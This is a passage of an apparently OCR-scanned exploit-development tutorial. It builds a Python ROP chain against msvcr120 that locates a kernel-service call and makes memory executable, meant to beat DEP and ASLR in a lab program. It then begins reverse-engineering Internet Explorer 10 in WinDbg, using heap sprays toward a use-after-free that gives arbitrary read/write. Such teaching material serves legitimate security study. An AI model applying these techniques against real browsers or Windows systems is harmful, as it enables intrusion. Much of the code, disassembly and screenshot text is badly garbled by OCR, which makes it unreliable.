73d451e4 763b1499 kernel32!HeapFree 

73d451e8 76ebe046 nitdll!RtlAllocateHeap 

73d451ec 763b14b9 kernel32! GetProcessHeapStub 
73d451f0 76ed2561 ntdll!RtIReAllocateHeap 

73d451f4 76ec304a ntdll!'RtlSizeHeap 

73d451f8 7643493f kernel32!HeapQuerylnformationStub 
73d451fc 763cb153 kernel32!HeapValidateStub 

73d45200 763b46df kernel32!HeapCompactStub 

73d45204 7643496f kernel32!HeapWalkStub 

73045208 76364992 kernel32!GetSystemlnfoStub 
73d4520c 763b4422 kernel32!VirtualQueryStub 

73945210 763b34f1 kernel32!GetFileT ypelmplementation 
73d45214 763b4d08 kernel32!GetStartup|InfoW Stub 
73d45218 763be266 kernel32!FileTimeToLocalFileTimeStub 
73d4521c 76365376 kernel32! GetFilelnformationByHandleStub 
73d45220 76434d61 kernel32!PeekNamedPipeStub 
73945224 763b3f1c kernel32!CreateFileWImplementation 
73045228 76361328 kernel32!GetConsoleMode 

73d4522c 76457842 kernel32!ReadConsoleW 

73d45230 76458137 kernel32!GetConsoleCP 

73945234 763cc/df kernel32!SetFilePointerExStub 
73945238 763b4663 kernel32!FlushFileBufferslmplementation 
73d4523c 7643469b kernel32!CreatePipeStub 

73045240 76434a8f kernel32!SetStdHandleStub 

73445244 76457е77 kernel32!GetNumberOfConsolelInputEvents 
73845248 76457445 kernel32!PeekConsolelnputA 
73d4524c 7645748b kernel32!ReadConsolelnputA 
73045250 763ca755 kernel32!SetConsoleMode 

73d45254 764574ae kernel32!ReadConsolelnputW 
73045258 76347392 kernel32!WriteConsoleW 

73d4525c 763cce06 kernel32!SetEndOfFileStub 
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73d45260 763dd56c kernel32!LockFileExStub 

73945264 763dd584 kernel32!UnlockFileExStub 

73445268 763b4a25 kernel32!IsDebuggerPresentStub 
7384526с 763d76f7 kernel32!UnhandledExceptionFilter 
73945270 763b8791 kernel32!SetUnhandledExceptionFilter 
73d45274 763b18e2 kernel32!InitializeCriticalSectionAndSpinCountStub 
73045278 763cd7d2 kernel32!TerminateProcessStub 
73d4527c 763b110c kernel32!GetTickCountStub 

73945280 763cca32 kernel32!CreateSemaphoreW 
73045284 763b89d1 kernel32!SetConsoleCtrlHandler 
73045288 763b16f1 kernel32! QueryPerformanceCounterStub 
73d4528c 763b51ab kernel32!GetEnvironmentStringsW Stub 
73945290 763b5193 kernel32!FreeEnvironmentStringsWStub 
73945294 763d34a7 kernel32!GetDateFormatW 

73045298 763cf451 kernel32!GetTimeFormatW 

73d4529c 763b3b8a kernel32! CompareStringWStub 
73d452a0 76361785 kernel32!LCMapStringWStub 

73d452a4 763b3c02 kernel32! GetLocalelnfoWStub 
73d452a8 763cce1e kernel32!IsValidLocaleStub 

73d452ac 763b3d65 kernel32! GetUserDefaultLCIDStub 
73d452b0 7643479f kernel32!EnumSystemLocalesWStub 
73d452b4 763db297 kernel32!OutputDebugStringAStub 
73945268 00000000 





| examined the ntdll functions one by one until | found a viable candidate: ntdll!RtlExitUserThread. 


Let's examine it: 
ntdll!RtlExitUserThread: 


76ее801с 8bff mov  edi,edi 
76ee801e 55 push ebp 


76ee801f 8bec mov  ebp,esp 
Тбее8021 51 push есх 
76ee8022 56 push esi 
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76ее8023 3316 xor esi, esi 
76ee8025 56 push esi 
76ee8026 ба04 ризћ 4 
76ее8028 8d45fc lea | eax|[ebp-4] 
76ee802b 50 push eax 


76ee802c 6a0c push OCh 

76ee802e 6afe push OFFFFFFFEh 

76ee8030 8975fc тоу dword ptr [ебр-4],еѕі 

76ее8033 e8d07bfcff call ntdll!NtQuerylnformationThread (7беаїс08) 





Now let's examine ntdll!NtQuerylnformationThread: 


ntdli!NtQueryInformationThread: 

76eafc08 b822000000 mov eax,22h 

76eafcOd 33c9 хог есх,есх 

T6eafcOf 80542404 lea edx,[esp+4] 

76eafc13 64ff15c0000000 call dword ptr fs:[0COh] 
76eafc1a 83c404 add еѕр,4 

76eafc1d c21400 ret 14h 





Perfect! Now how do we determine the address of that call dword ptr fs:[0C0h]? 


We know the address of ntdll!'RtlExitUserThread because it's at a fixed RVA in the IAT of msvcr120. At the 
address ntdll!RtIExitUserThread+0x17 we have the call to ntdll!'NtQueryInformationThread. That call has this 
format: 


here: 
E8 offset 


and the target address is 


here + offset + 5 


In the ROP we will determine the address of ntdli!NtQueryInformationThread as follows: 


EAX = 0x7056507c ; ptr to address of ntdll!RtlExitUserThread (IAT) 
EAX = [EAX] ; address of ntdll!RtlExitUserThread 


EAX += 0x18 ; address of "offset" component of call to ntdll!NtQueryInformationThread 
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EAX += [EAX] + 4 ; address of ntdll!NtQuerylnformationThread 
EAX += Oxb ; address of "call dword ptr fs:[OCOh] # add esp,4 # ret 14h" 


We're ready to build the ROP chain! As always, we'll use mona: 


Јоаа pykd.pyd 


Іру mona rop -m msvcr120 


Here's the full Python script: 
Python 


import struct 


msvcr120 = 0x73c60000 


md = msvcr120 - 0x70480000 


def create rop chain(code size): 
rop gadgets = [ 


md + 0х704аѓ28с, 
OXffffffff, 
md + 0х70532761, 


та + 0х70414681, 
[с AL. 
md + 0x7054b28e, 


0x11111111, 


md + 0х70412487, 
md + 0x704846b4, 
md + 0x704e986b, 


0x11111111, 
md + 0x7048f607, 
0x11111111, 


md + 0x70414681, 
OxfffffffO, 
md + 0x7054b28e, 


0x11111111, 
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md + 0х704е9866, 


0x11111111, 
md + 0x7048f607, 
ОИ ИМАМА 


та + 0x705370e0, 
та + 0x705370e0, 
та + 0x705370e0, 
та + 0x705370e0, 


та + 0x704e4ffe, 
md + 0x704e4ffe, 
md + 0x704e4ffe, 
md + 0x704e4ffe, 


md + 0x704e986b, 


0x11111111, 
md + 0x7048f607, 
0x11111111, 


md + 0х70412487, 
та + 0x7053fe65, 
ОМА 211111 
та + 0x7053fe65, 
0x11111111, 
md + 0x7053fe65, 
0x11111111, 
md + 0x7053fe65, 
0x11111111, 
md + 0x704846b4, 


md + 0x7053befb, 
md + 0x7056507c, 
md + 0x70501e19, 


0x11111111, 
0x11111111, 


md + 0x7049178a, 
md + 0x7049178a, 
md + 0x70491 78a, 
md + 0x704a691c, 


md + 0х704еса87, 


0x11111111, 
0x11111111. 
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md + 0x7048f607, 
0x11111111, 


| + 0x70491 78a, 
| 50х704аа201, 
| 50х704аа201, 
| 50х704аа201, 


| + 0x704819e8, 


| + Ox70412485, - 
md + 0х7053686. 
Ox4d, 


md + 0x704c0a08, 
md + 0x7055adf3, 
0x11111111, 
0x11111111, 
МИНИ, 
ИМЕ, 
0x11111111, 


0x90901eeb, 


Oxffffffff, 
0x11111111, 
0x11111111, 
0x40, 

+ 0x705658f2, 


0х11111111, 
+8 


def write file(fi 


МИП 


Nh" ас 
WU) ds 


‚= md + Ox7048f607 
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The first part of the ROP chain initializes the arguments which are located at the end of the ROP chain itself: 
Python 


0x90901eeb, 


Oxffffffff, 
OXW 
ox, 
0x40, 

nd + 0x705658f2, 


0x11111111, 
| +8 
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The second argument (&address) is overwritten with end_args and the third argument (&size) with end_args 
+ 4. To conclude, address (at end args) is overwritten with its address (end args). 


Note that our code starts at real code, so we should overwrite address with real code, but there's no need 
because VirtualProtect works with pages and it's highly probable that real code and end args point to the 
зате раде. 


The second part of the ROP chain finds call dword ptr fs:[0C0h] # add esp,4 # ret 14h in ntdll.dll and make 
the call to the kernel service. 


First run the Python script to create the file name.dat and, finally, run exploitme3.exe. The exploit should 
work just fine! 


Now you may enable all the protections (except for ASR, which doesn't apply) and verify that our exploit still 
works! 
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IE10: Reverse Engineering IE 


For this exploit I’m using a VirtualBox VM with Windows 7 64-bit SP1 and the version of Internet Explorer 10 
downloaded from here. 


To successfully exploit IE 10 we need to defeat both ASLR and DEP. We're going to exploit a UAF to modify 
the length of an array so that we can read and write through the whole process address space. The ability of 
reading/writing wherever we want is a very powerful capability. From there we can go two ways: 


1, Run ActiveX objects (God mode) 
2. Execute regular shellcode 


For the phase UAF — arbitrary read/write we're going to use a method described here. 


Reading that paper is not enough to fully understand the method because some details are missing and | 
also found some differences between theory and practice. 


My goal is not to simply describe a method, but to show all the work involved in the creation of a complete 
exploit. The first step is to do a little investigation with WinDbg and discover how arrays and other objects 
are laid out in memory. 


Reverse Engineering IE 
Some objects we want to analyze are: 


Array 
LargeHeapBlock 
ArrayBuffer 
Int32Array 


Setting up WinDbg 

By now you should already have become familiar with WinDbg and set it up appropriately, but let's make 
sure. First, load WinDbg (always the 32-bit version, as administrator), press CTRL-S and enter the symbol 
path. For instance, here's mine: 


SRV*C:\WinDbgSymbols*http://msdl.microsoft.com/download/symbols 


Remember that the first part is the local directory for caching the symbols downloaded from the server. 
Hit OK and then save the workspace by clicking on File—Save Workspace. 


Now run Internet Explorer 10 and in WinDbg hit F6 to Attach to process. You'll see that iexplore.exe appears 
twice in the list. The first instance of iexplore.exe is the main process whereas the second is the process 
associated with the first tab opened in IE. If you open other tabs, you'll see more instances of the same 
process. Select the second instance like shown in the picture below: 
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Attach to Process 


9 System order By Executable 


Process ID 


Noninvasive 





This is the layout | use for WinDbg: 
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Pid 3224 - WinDbg:6.3.9600.16384 X86 
File Edit View Debug Window Help 


10) PP $5 | EJ R3 54 (1 278) © CT ETT 2T 





Memory 
Offset: 'opeip Virtual: 25а4 324] Display format: | Long Hex У | | Previous 


No prior disassembly рог e 0 9 727132 000 0 00000000 0 00 0524Е948 0 
ntdll!DbgBreakPoint 05 9Е4 7 5 99£3d 0 П5а4Ғайс 00000000 72 
| 4 00000000 72444811 00000000 00000000 000000 00000000 0 00000000 
05441 ИЕН 7 0000000 а 7219f45 
7727£8ea 00000000 000000 00000000 00000000 00000000 27 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 0000 0000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 

00000000 0 00000000 00000000 0000 00000000 00000000 000000 

0 244 00000000 0000 0 000 00 000 00000000 00 

n cept ionHandler4Üxf (771#001#) 00000000 00000000 00000 00000000 00000000 000000 
а еВа1140100 А rt (772014с0) 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
5801000000 05545534 00000000 00000000 000 00000000 00 00000000 00 00000000 
с21000 05а4і4Һ54 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
7 90 05445574 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
UseràpcDispatche 05445594 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
Bc di 0 sp42DCh] 05441554 00 0000 0 0000 00000000 000 0 
648b0d00000000 word ptr #=:[0] Оса4ЕЪа& 00000000 00000000 00000 00000000 00000000 00000000 00000000 00000000 
6 Т y ffset ntdll!KiUserApcExceptionHandler (77140010) 0554:5Е4 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
ptr [eax], ecx 05841014 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
dword ptr [еах+4].ейх П5а4іс34 00000000 00000 00000000 00000000 00000 00000000 00000000 
буора ptr fs:[00000000h],eax 05а44с54 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
05844874 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
05а4#с94 00000000 00 00000000 00000000 00 00000000 
00000000 00000 00000000 00000000 00000000 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 


00 00000 00000000 0000 000 


00000000 00000000 00000000 00000000 00000000 00000000 80 00000000 


ModLoad: 72440000 72625000 
ModLoad: 72440000 
ModLoad: 75540000 75562000 
ModLoad 0 7 0000 
ModLoad 00 75522000 
ModLoad 
ModLoad: 
ModLoad аб 0 л 
ModLoad «V i e сіз 6585b6 c -5.8 8201 попе 80# 006859 3eceSNCOMCTL32 411 
ModLoad: DMProg E (x86) Java jrel.8.0 . Sy 
HodLoad Без00000 6 000 о л Е 86)«Javasjrei.8.0 . 
ModLoad 30000 6000 С: ғ  ОЮ64-3сгір%9.011 
ModLoad: 72430000 9 Ci Windows* 1Е01,411 
ModLoad 50000 C:\Window: 4*ieapfl dll 
7483 0000 6 с 5 "nsintf 


74530000 
5e 240000 6e42 
ins truction atcoption = 0 ci 
0000000 00000 0000000 
5а41а00 ре pe nc 
с с 025 fs- efl-00000246 
ntdll!DboBreakPoint 
7711000с cc 3 





0:011» 


Ln0,ColO SysO:«Local- Ргос 000:с98 Thrd 011112 


Set the windows the way you like and then save the workspace again. 


Array 
Let's start with the object . Create an html file with the following code: 


XHTML 


pt t language- "javascript" 
t("Start"); 
var a = new Array(0x123); 
for (vari = 0; i < 0x123; ++i 
[i] = 0x111; 
"Done"; 


Open the file in IE, allow blocked content, and when the dialog box with the text pops up run WinDbg, 
hit F6 апа аїїасһ the debugger to the second instance of like you did before. Hit F5 (go) to 
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resume execution and close the dialog box in IE. Now you should be seeing the second dialog with the 
message Done. 


Go back in WinDbg and try to search the memory for the content of the array. As you can see by looking at 
the source code, the array contains a sequence of 0x111. Here’s what we get: 


0:004» s-d 0 L?ffffffff 111 111 111 111 


We got nothing! How odd... But even if we had found the array in memory, that wouldn't have been enough 
to locate the code which does the actual allocation. We need a smarter way. 


Why don’t we spray the heap? Let’s change the code: 
XHTML 


| rray(); 
гі = 0; i < 0x10000; ++i) { 
(0x1000/4); 
г|-0;:|< ШІМ ngth; 3-8) 


ШІ = 0х111; 





After updating the html file, resume the execution іп WinDbg (F5), close the Done dialog box in IE and 
reload the page (F5). Close the dialog box (Start) and wait for the next dialog box to appear. Now let’s have 
a look at IE’s memory usage by opening the Task Manager: 
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& Windows Task Manager 


File Options View Help 
Applications | Pr S | Services | Performance | Networking 


Memor 





We allocated about 550 МВ. We сап use ап application called VMMap (download) to get a graphical 
depiction of our heap spray. 


Open VMMap and select the right instance of iexplore.exe as shown in the picture below: 


ћир: //expdev-kiuhnm.rhcloud.com 





- 293 - 





8 ' Select or Launch Process 


View a running process | Launch and trace a new process 


^ 
Name 


sTray.exe 
' dwm.exe 
„| explorer. 
G iddyRSP.exe 7: re A 
Greenshot gandalf-P 
gandalf-P 
4648 — 
andalf-PC\gandalf 
cd 


! taskhost.exe 2 gandalf-P 


— PCY 


Refresh *y Show All Processes 





Now go to ян, . You'll see something like this: 
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Ш МММар - Sysinternals: www.sysinternals.com 
File Edit View Options Help 


Process: iexplore.exe 
PID: 4648 


Committed: 695.944 K 


0x00000000 | ista - == e 


560.852 K 


| 


574.532 K 


Private Bytes: 


Working 


Type ble WS ^ 
Image 
Mapped File 
Shareable 


12.904 К 
740K 
2.172K 


Page Table 
Unusable 


0х2ЕОВА000 


Address:|Ox1FFD0000,|Size: 128K, Private Data 





The area in yellow is the memory allocated through the heap spray. Let's try to analyze the memory at the 
address , which is in the middle of our data: 
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Pid 4648 - WinDbg:6.3.9600.16384 X86 


e Edit View Debug Window Help 





ETE E ЕГ гайг: ва ETE 





Memory | 
Display format: Previous Next 
00 00000000 000000 000 
3 00000223 00000 27 


0 00000223 0000022 
77110004 t 0 02 00000223 0000022 


7718 
771:000Е 90 вор 
ntdll!EKiUserhàpcExceptionHandler ff 0 0000 

771£0010 8b4c2404 X, c t 0 0000 

77110014 2410406 t ус t 6 00000 00000 

77180018 7405 3 111 1їхөгАрсЕксерсїопНапй өгөйх (77180018 

77150014 td > stAlert (7?201dc0) 

7714 Е 

771800 

771800 9 c > 

ntdll!Kil 3 ћех а 000002 


77110028 2 0 les [espe-2DC 00000223 00 000002 
7718002Ё 64850400000000 mov ecx.dword ptr fs:[0] 0 0 
77180036 bal0001f77 at ntdll!KiUseràpcExcepticnHandler (77110010) 
8308 dvor x 
dword ptr [ 
7 0 00000 dword ptr f 
72140046 58 eax d 0 0 000002 
77180047 847с240с 5 edi. [esp+0Ch] 0 0 000 000002 
771£004b 0 
77180044 с020000 ecx,dword ptr | h на 00000 00007 0 
7714005 dword ptr f d 000008 0000022: 
1 0 0 000002 
771f005c 57 i ££00360 00000 00 22 00 2 1000 











Why 0х223 and not 0x111? 


147000 Is this really one of our arrays? 

7 000 ХРЕЧОВЈ .dll 
667Ы 0 9 5 SD3D1DWarp.dll 
27 20000 M uiauto 


ModLoad 

(1228.1 

eax=7efd7000 С jea 1=00000000 

е1р=771Е00 nv up ei pl zr па pe nc 
023 > es-002b #0053 2b etl-00000246 


int 


000 
2500 2ebd000 
4600000 64546000 





Ln0,ColO Sys 0;<Local> Proc 000:1228 Thrd 005:1380 


Let's make it sure that this is indeed one of our arrays by modifying the code а bit: 
XHTML 


pt language="javascript" 
ert("Start"); 
var a = new Аггау(); 
for (vari = 0; i < 0x10000; ++i) ( 
[i] = new Атау(0х1234/4); //0х1234/4 = 0x48d 
for (var j = 0; j < а[1.1 15 m 
alil] = 0x123; 


rt("Done"); 


We repeat the process and here’s the result: 
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Pid 5072 - WinDbg:6.3.9600.16384 X86 
Edit View Debug Window Help 
| DPP 3j | Ба Ed EJ EJ mt OO 








Memo 


lE 
Virtual: 1££40000 5 = 











Ко prior d y e 000 ) а) 1000000 
ntdll!DbgBresk 0000247 909002 4 
02 00000247 2 ) 00000247 
79180004 00000247 

7712000 7 

77180008 50 пор 

ntdll!KiUser axceptionHandler d 00 0 0 17 00 0 одо 0002 
77110010 8b4c2404 mov dword ptr [esp+4] 00 Ё 0 С 002 00 0 0 000002 
77180014 £6410406 yte ptr 0000 0 0 

77180018 7405 ntdll|Killserà onHandler+0xf (77180018) С 0 0 47 


771#001а 2821180100 ntdlllZwT 7201450) === === 
3 Maybe the actual length 


121:0024 ES 904 length of our arrays! 

77 0 L Ы Н 

ШЕККЕН 682000 d 208 : 0 ? Ове 9 — y of the array is 0x48d, but 
ntdll!KiUserpc c 00000247 000002 Ї 

77180028 2 0 eax, [esp*2DCh] 150500600547 TE a it was reserved enough 
771Ғ 6 0000 dword ptr fs 00000247 space for 0x490 
77180036 0 V ceptionHandler (77180010) 0 1000247 0 00247 0 

771£003b 8 V 2 0 00000247 80000247 elements. 

771£003d 8 і 1 > с 00000247 00000247 (707 

771£0040 00000 how 0247 7 00000247 

7714004 eax f 0 2 247 000002 

77180047 84722 edi, [esp+0Ch] 0 0 00000247 00000247 

771£004b ) ea 0 0 00000247 00000 

77180044 v ecx.dword ptr [edie2CCk Цин А 0 

771Ғ005 6 00 0 r dvord ptr fs:[0].e 0000 0 ES 0 00000247 0000 00000247 00000 00000247 
77110054 6 1 11140340 0 47 00000247 00000247 00000247 00000247 00000 00000247 
771f005c 7 iffdü360 000002 00 02 00000247 00000247 00000247 00000247 000002 00000247 





Command 0x1250 is the size of the reserved space for РЕ 
030000 Progr jrel.8.0 25wbin*nsvcrl00.dll the array in bytes plus 0x10 which is probably А 
РЕН 65535000 ХАГ the size of the header surrounded by the 
72815000 : про 1 yellow rectangle. 
P 


845000 ndo Masintf.dll 
000 А 


00 
0000 


000000 edi=0 
v up ei pl zr па ре 
ef 1-00000246 





їл0,Со!0 SysO:<Local> Proc 000:13d0 Thrd 016:464 


As we can see, now the array contains the values . Let’s try something different: 
XHTML 


t language="javascript"> 
rt("Start"); 
var a = new Array(); 
for (var i = 0; i < 0х10000; ++i) { 
ali] = new Аггау(0х1000/4), 
for (var j = 0; j < а.1 h; ++j) 


illj] = j; 


Now we get the following: 





Ё! Pid 5072 - WinDbQ:6.3.9600.16384 X86 


File Edit View Debug Window Help 
| | mss |mw 17 n LE E Ea EE ET S] OC 


Display format: 


ntdll 
1491117. 
2 


onHandler 


Command 


490x4 + 10 
n 


іл 0, Col O0 Sys > 244 AS OVR CAPS NUM 





Now the array contains the odd numbers starting with 1. We know that our array contains the numbers 
123456789... 


but we get 


3579111315 ІТ 197. 





It's clear that ће number n is represented as . Why is that? You should know that an array can also 
contain references to objects so there must be a way to tell integers and addresses apart. Since addresses 
are multiple of 4, by representing any integer as an odd number, it'll never be confused with a reference. But 
what about a number such as which is the biggest positive number in ? Let's 
experiment a bit: 


XHTML 


«html» 
<head> 
<script language="javascript"> 


alert("Start"); 
Var new Array(); 
ar i = 0; i < 0х10000; ++i) { 
v Аггау(0х1000/4), 
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2! Pid 5072 - WinDbg:6.3.9600.16384 X86 
le Edit View Debug Window Help 


5 | a| у ж | wd 10101 452 EI EJ gg 5 CT ОИ F5 | Ал | 9 





emb 





Offset: 8 еїр Lf 00 "(Long Hex >, 


No prior disassenbly possible nannnn nnnninin A 00000000 0 400 00000 
ntdll!DbgE Point 29538070 1112 38080 00000000 00000000 00000000 00000000 
түр 00000000 00000000 00000000 
77180004 сз ret 0 D 00 ét 0000 0 000 00000000 0 0 
771£000e 90 пор Р - 0 000 000 10 00000000 0 000 00000000 00000 
771£000£ 90 nop 06871700 0 9 00000000 00000000 00000000 00000000 
ntdlllKiUserhpcExceptionHandler M 172--4 t 0.16384 X86 : i 00000000 000 0000000 00000000 00000000 
77180010 8Ь4с2404 : - 000000004 р 0 0 00 0 000 000 0000 
72180014 £6410406 Previous | Display format: |Long Hex 15140100 000 0 00000000 00000000 00000000 00000000 00000000 00000000 
77140018 7405 j = z 2 0 00000000 00000000 00000000 00000000 00000000 00000000 
77150014 1140100 00000000 0 00000000 00000000 00000 
771£001£ 0 ( 
77140024 
77180027 
ntdll!K 





) 
00000 0 


000 й 
00000000 870000 00000000 00000000 0 
00000000 00000000 00000000 2 0 00000000 00000000 00000000 3 2 
00000000 0000 f. DEO 000 00000000 0 1#4401ай 00000000 0000000 00000000 00000000 00000000 00000000 
00000 000 00 b38110 000 00000000 02287000 ЕО ОО ООО О 0000000000000 0000000050 00000000 
: 00000000 па 22032120 000000010 00000000 Одо 18180150 00000000 00000008 00000000 00800000 00000000 00000000 
64850400 nov [ 1240200 0 00000000 00000000 00000000 00000000 
bal0001f77 nov x,of Agfnory WinDbg:6.3.9600.16384 X86 81 |$ 16440220 : ч 00000000 00000000 00000000 00000000 
771£003b 8908 nov o 1490240 -2 is stored directly. || | o 00 00 ) 00001 
72140034 895004 nov ч V Display format: [Long 8 + 1£fd0260 000000 , 00000000 00000000 00000000 0000 
77110040 642300000000 КЕКТІ ЖЕТТІ E SUM 00100007 17000000 00000000 12190280 0000004 can't be an address 00000000 00000000 00000000 00000000 
77110046 2 eax Е Зас94а0 1266978 70000 00000000 00000 000000 Е ай 000000 00000000 00000000 00000000 00000000 
771004? г 9 00000000 0 002 бай 00000000 00000000 00000000 000000! because addresses are 00000000 00000000 00000000 00000000 
77180045 ffdü а 2 0 a 00000 00000000 00000000 1Е1402в0 000000 <= Ox7fffffff 00000000 00000000 00000000 00000000 
77140044 85820020000 у : 5 00000000 Пей 00000000 00000000 00000000 itid0300 000000 00000000 00000000 00000000 
77180053 64890400000000 o 2 00000000 100 00000000 00000000 00000000 1££40320 000000 7 T П Ù 00000000 00000000 00000000 
771£008a бай Е 9 00000098 00000000 00000000 1290340 00000 0 0000 00000000 00000000 000000 
7714005с edi А мени 1220360 00000000 00000000 00000000 00000000 00000000 00000000 00000000 




















Command ) = Next P-E 


03b6££00 00000000 00000003 04678 00000000 60 00000000 
00000000 00000000 00000000 6ea42248 03561800 00000003 
7 007 00 00000000 00 00000000 

48 ФЕЕ0О 00000000 0 3 04 0 000 0 360 
й 00000000 00000000 00000000 00000000 6ea42248 03563800 00000000 00000003 
0467 00000000 0510с420 00000000 00000000 00000000 00000000 00000000 
bea 48 0356ЕЁ00 00000000 00000003 O4679b9s 00000000 05105460 00000000 


006 
:006 
006 


jscript9!Js::NullEnumerator:: vftable" 


ript$|Projection: ArrayObjectInstance: ^ vitable' 6 0 Js: :SinpleDict ionaryTypeHsndlerBase<unsigned short.1»:: vftable 





no type information» 
vftable' = спо е information» 





Ln0,ColO SysO:«Local- Proc 000:1300 Thrd 006:8f4 


The number is too big to be stored directly so, instead, IE stores a reference to a 
object. The number -2 is stored directly because it can't be confused with an address, having its highest bit 
set. 


As you should know by now, the first dword of an object is usually a pointer to its vitable. As you can see 
from the picture above, this is useful to determine the identity of an object. 


Now let’s find out what code allocates the array. We can see that there are probably two headers: 
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The first header tells us that the allocated block is 0x1010 bytes. Indeed, the allocated block has 0x10 bytes 
of header and 0x1000 bytes of actual data. Because we know that one of our array we'll be at the address 
0х1#а0000, we can put hardware breakpoints (on write) on fields of both headers. This way we can find out 
both what code allocates the block and what code creates the object. 


First reload the page and stop at the Start dialog box. Go to WinDbg and stop the execution (CTRL+Break). 
Now set the two breakpoints: 

0:004> ba w4 1ffd0000+4 

0:004> ba w4 1ffd0000+14 

0:004> bl 

0 e 1ffd0004 w 4 0001 (0001) 0:**** 

1 e 1ffd0014 w 4 0001 (0001) 0:**** 





Hit F5 (ignore the error messages) and close the dialog box in IE. When the first breakpoint is triggered, 
display the stack: 


0:007» k 20 
ChildEBP RetAddr 


06716630 беа5 7288 jscript9!Recycler::LargeAlloc+0xa1 
0671bb4c 6eb02c47 jscript9! Recycler::AllocZero* 0x91 
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0671bb8c 6ea82aae jscript9!Js::JavascriptArray::DirectSetltem Full-Ox3fd 
06716с14 05f2074b jscript9! Js::JavascriptOperators::OP_SetElementl+0x1e0 
WARNING: Frame IP not in any known module. Following frames may be wrong. 
0671bc48 беа7 7461 0x5f2074b 

0671bde4 6ea55cf5 jscript9! Js::InterpreterStackFrame::Process-*0x4b47 
0671bf2c O5f80fe9 jscript9! Js::InterpreterStackFrame::InterpreterThunk<1>+0x305 
0671bf38 6ea51f60 Ox5f80fe9 

0671bfb8 6ea520ca jscript9! Js::JavascriptFunction::CallRootFunction+0x140 
0671bfdO беа52097 jscript9!Js::JavascriptFunction::CallRootFunction+0x19 
0671с018 6ea52027 jscript9!ScriptSite::CallRootFunction+0x40 

0671c040 6eafdf75 jscript9!ScriptSite::Execute+0x61 

0671c0cc 6eafdb57 jscript9!ScriptEngine::ExecutePendingScripts+0x1e9 
0671c154 6eafe0b7 jscript9!ScriptEngine::ParseScriptTextCore-*0x2ad 
0671с1а8 O069cb60c jscript9! ScriptEngine::ParseScriptT ext+Ox5b 

0671c1e0 069c945d MSHTML!CActiveScriptHolder::ParseScriptT ext+0x42 
0671с230 06955521 MSHTML!CJScript9Holder::ParseScriptText+0x58 
0671с2а4 069ссба4 MSHTML!CScriptCollection::ParseScriptT ext+0x1f0 
0671с394 069сс242 MSHTML!CScriptData::CommitCode-*0x36e 

0671с40с 069cbe6e MSHTML!CScriptData::Execute+0x233 

0671c420 069c9b49 MSHTML!CHtmScriptParseCtx::Execute+0x89 
0671c498 067d77cc MSHTML!CHtmParseBase::Execute+0x17c 

0671c4c4 755862fa MSHTML!CHtmPost::Broadcast+0x88 

0671c5c4 069c3273 user32!InternalCallWinProc*0x23 

0671c5dc 069c31ff MSHTML!CHtmPost::Run+0x1c 

0671c5f4 069c34f3 MSHTML!PostManExecute+0x5f 

0671c610 069c34b2 MSHTML!PostManResume+0x7b 

0671c650 06830dc9 MSHTML!CHtmPost::OnDwnChanCallback+0x3a 
0671c660 0677866c MSHTML!CDwnChan::OnMethodCall+0x19 

0671c6b4 067784fa MSHTML!GlobalWndOnMethodCall+0x169 

0671c700 755862fa MSHTML!GlobalWndProc+0xd7 

0671c72c 75586d3a user32!InternalCallWinProc+0x23 





We can see three things: 
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1: IE uses a custom allocator. 
2. The array is of type jscript9!Js::JavascriptArray. 
3. The block is probably allocated when we set the value of the first item of the array (*). 


Let's return from the current call with Shift-F11. We land here: 


бе9е72се ба00 ризћ 0 

6e9e72d0 50 ризћ еах 

беде7 281 51 push есх 

6e9e72d2 56 push esi 

6e9e72d3 e80f34ffff call jscript9!Recycler::LargeAlloc (6e9da6e7) 


6e9e72d8 с70000000000 mov адуогарїг[еах]О ds:002b:1ffd0010-00000000 ме аге һеге 
6e9e72de 5е рор esi 
6e9e/2df 5d рор e To) 
6e9e72e0 с20400 ret 4 





Let's hit Shift- F11 again: 


6ea92c3f 51 push ecx 

6ea92c40 8bca mov  ecx,edx 

беа92с42 е89а674# call jscript9!Recycler::AllocZero (6e9d93e1) 

беа92с47 8b55e8 mov  edx,dword ptr [ebp-18h] ss:002b:04d2c058-04qd2c054 < we are here 
беа92с4а 8b0a mov есх,амога ptr [edx] 

беа92с4с с70000000000 том dword ри [еах],0 





EAX points to the buffer, so we can put a breakpoint on 6e392c47. First let's write the address of EIP so that 
it doesn’t depend on the specific base address of the module. First of all we’re in jscript9, as we can see 
from this: 


0:007> laddress @eip 


Mapping file section regions... 


Mapping module regions... 


Mapping PEB regions... 


Mapping TEB and stack regions... 
Mapping heap regions... 
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Mapping page heap regions... 
Mapping other regions... 
Mapping stack trace database regions... 


Mapping activation context regions... 


Usage: Image 

Base Address: 6e9d1000 

End Address: бес54000 

Region Size: 00283000 

State: 00001000 MEM_COMMIT 

Protect: 00000020 PAGE_EXECUTE_READ 
Type: 01000000 MEM_IMAGE 

Allocation Base: 6e9d0000 

Allocation Protect: 00000080 PAGE_EXECUTE_WRITECOPY 
Image Path: C:\Windows\SysWOW64\jscript9.dll 
Module Name: jscript9 

Loaded Image Name: _C:\Windows\SysWOW64\jscript9.dll 


Mapped Image Name: 


More info: Imv m jscript9 
More info: !Imi jscript9 
More info: In 0x6ea92c47 
More info: 'аћ Охбе9а0000 


Unloaded modules that overlapped the address in the past: 
BaseAddr EndAddr Size 
беа90000 береаооо 159000 МВохов!-хв86.а! 
бе960000 бер0аооо 159000 МВохов!|-х86.а! 


Unloaded modules that overlapped the region in the past: 
BaseAddr EndAddr Size 
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6ebf0000 6eccb000 95000 мпеаЗамаат-х86.а! 
беа90000 беђеаооо 159000 МВохов1|х86.а! 
6e940000 6ea84000 144000 VBoxOGLcrutil-x86.dll 


бер10000 берер000 40000 wined3dwddm-x86.dll 
бе960000 бер0аооо 159000 VBokOGL-£86.dII 





So, the RVA is the following: 


0:007» ? @eip-jscript9 
Evaluate expression: 797767 - 000c2c47 





